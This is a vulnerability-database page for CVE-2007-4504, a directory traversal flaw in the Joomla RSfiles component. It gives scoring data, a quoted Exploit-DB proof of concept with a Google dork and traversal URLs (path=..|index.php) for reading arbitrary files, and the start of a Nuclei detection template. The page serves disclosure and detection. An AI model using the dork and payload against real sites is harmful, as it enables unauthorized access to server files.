CVE-2007-4504
published 2007-08-23CVE-2007-4504: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary…
PriorityP434medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
9.49%
94.8th percentile
Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomla | rsfiles | <= 1.0.2 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component RSfiles 1.0.2 - 'path' File Download
exploitdb·2007-08-23
CVE-2007-4504 Joomla! Component RSfiles 1.0.2 - 'path' File Download
Joomla! Component RSfiles 1.0.2 - 'path' File Download
---
# Title : Joomla Component RSfiles <= 1.0.2 (path) Remote File Download Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.rsjoomla.com
# $$ : 10 $
# Dork : inurl:"/index.php?option=com_rsfiles"
# DorkEx : http://www.google.com.tr/search?hl=tr&q=inurl%3A%22%2Findex.php%3Foption%3Dcom_rsfiles%22&btnG=Ara&meta=
[[Remote File]]]---------------------------------------------------------
http://[target]/[path]//index.php?option=com_rsfiles&task=files.display&path=[File]
Example:
//index.php?option=com_rsfiles&task=files.display&path=..|index.php
//index.php?option=com_rsfiles&task=files.display&path=..|..| etc..
[[/Remote File]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-08
Nuclei
Joomla! RSfiles <=1.0.2 - Local File Inclusion
nuclei·CVSS 5.0
CVE-2007-4504 [MEDIUM] Joomla! RSfiles <=1.0.2 - Local File Inclusion
Joomla! RSfiles <=1.0.2 - Local File Inclusion
Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
Template:
id: CVE-2007-4504
info:
name: Joomla! RSfiles <=1.0.2 - Local File Inclusion
author: daffainfo
severity: medium
description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files
2007-08-23
Published